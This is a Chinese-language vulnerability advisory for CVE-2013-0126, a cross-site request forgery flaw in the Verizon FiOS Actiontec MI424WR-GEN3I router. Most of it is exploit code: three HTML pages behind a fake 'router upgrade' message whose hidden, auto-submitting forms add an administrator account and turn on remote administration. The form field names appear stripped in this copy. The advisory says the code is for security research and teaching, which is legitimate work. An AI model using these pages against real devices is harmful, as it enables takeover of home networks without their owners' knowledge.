发布日期:2013-03-18
更新日期:2013-03-19
受影响系统:
Verizon FiOS Router
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58553
CVE(CAN) ID: CVE-2013-0126
Verizon FIOS是无线光纤宽带路由器。
Verizon FIOS Actiontec 路由器模块MI424WR-GEN3I及其他版本在实现上存在跨站请求伪造漏洞,成功利用后可造成在受影响设备上运行任意命令。
<*来源:Jacob Holcomb
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Exploit Code:
HTML FILE #1
<html>
<title>Cisco Verizon FIOS CSRF - Adding Administrator User</title>
<!--Cisco Model: MI424WR-GEN3I -->
<!--Firmware Version: 40.19.36 -->
<h1>Please sit tight while we upgrade your router</h1>
<body>
<form action="http://www.example.com/index.cgi" method="post">
<input type="hidden" value="101"/>
<input type="hidden" value="User Settings"/>
<input type="hidden" value="submit_button_submit: .."/>
<input type="hidden" value="."/>
<input type="hidden" value="0"/>
<input type="hidden" value="-1"/>
<input type="hidden" value=""/>
<input type="hidden" value="g42"/>
<input type="hidden" value=""/>
<input type="hidden" value="G42"/>
<input type="hidden" value="2"/>
<input type="hidden" value="15"/>
<input type="hidden" value="15"/>
</form>
<script>
function CSRF1() {window.open("http://10.0.1.101/verizonFIOS2.html");};window.setTimeout(CSRF1,1000)
function CSRF2() {document.verizonCisco.submit();};window.setTimeout(CSRF2,1000)
</script>
</body>
</html>
HTML FILE #2
<html>
<title>Cisco Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation</title>
<body>
<form action="http://www.example.com/index.cgi" method="post">
<input type="hidden" value="101"/>
<input type="hidden" value="User Settings"/>
<input type="hidden" value="submit_button_confirm_submit: .."/>
<input type="hidden" value="."/>
<input type="hidden" value="0"/>
</form>
<script>
function CSRF1() {window.open("http://10.0.1.101/verizonFIOS3.html");};window.setTimeout(CSRF1,0500)
function CSRF2() {document.verizonCiscoC.submit();};window.setTimeout(CSRF2,0500)
</script>
</body>
</html>
HTML FILE #3
<html>
<title>Cisco Verizon FIOS CSRF3 - Enable Remote Administration</title>
<body>
<form action="http://www.example.com/index.cgi" method="post">
<input type="hidden" value="9078"/>
<input type="hidden" value="page_remote_admin"/>
<input type="hidden" value="Remote Administration"/>
<input type="hidden" value="submit_button_submit: .."/>
<input type="hidden" value=""/>
<input type="hidden" value="0"/>
<input type="hidden" value="1"/>
<input type="hidden" value="0"/>
<input type="hidden" value="0"/>
<input type="hidden" value="0"/>
<input type="hidden" value="0"/>
<input type="hidden" value="0"/>
<input type="hidden" value="0"/>
<input type="hidden" value="0"/>
<input type="hidden" value="0"/>
<input type="hidden" value="0"/>
<input type="hidden" value="1"/>
</form>
<script>
function CSRF1() {document.verizonCiscoRemote.submit();};window.setTimeout(CSRF1,0000)
</script>
</body>
</html>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Verizon
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: